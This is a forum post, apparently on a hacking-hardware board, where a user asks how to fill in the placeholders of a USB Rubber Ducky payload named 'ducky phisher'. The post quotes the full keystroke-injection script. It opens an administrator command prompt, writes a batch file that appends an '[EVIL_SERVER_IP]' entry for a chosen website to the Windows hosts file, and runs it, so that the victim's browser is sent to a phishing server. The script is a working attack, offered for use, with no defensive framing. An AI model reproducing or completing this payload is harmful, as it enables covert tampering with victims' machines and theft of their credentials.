Jump to content

Payload ducky phisher


xstormx
 Share

Recommended Posts

Hey guys,

Do I replace the Green statements with the evil server IP and web address with or without the brackets and quotes? Secondly can someone decipher what this means "you need to add the www. version and with out it as well." in the 5th REM line? Thanks in advance guys

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---ducky-phisher

REM Author: .:Koryusai-Kun:.

REM Description: Used for phishing, it add's an ip of your choosing to the hosts file on windows
REM Description: so when the user types into there web browser for example www.facebook.com it
REM Description: insted of going to the proper ip it gose to the one in the host file your evil one.
REM Description: you need to add the www. version and with out it as well.
REM ---[start CMD as administrator]-----------------------

GUI
DELAY 50
STRING cmd
DELAY 150
MENU
DELAY 75
STRING a
Enter
DELAY 200
LEFT
ENTER
STRING cls
ENTER
REM ---[END]----------------------------------------------
DELAY 300
REM ---[inject into the host file]------------------------
STRING copy con inject.bat
ENTER
STRING SET NEWLINE=^& echo.
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
CONTROL z
ENTER
STRING inject.bat
ENTER
REM ---[END]----------------------------------------------
DELAY 200
STRING exit
ENTER

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...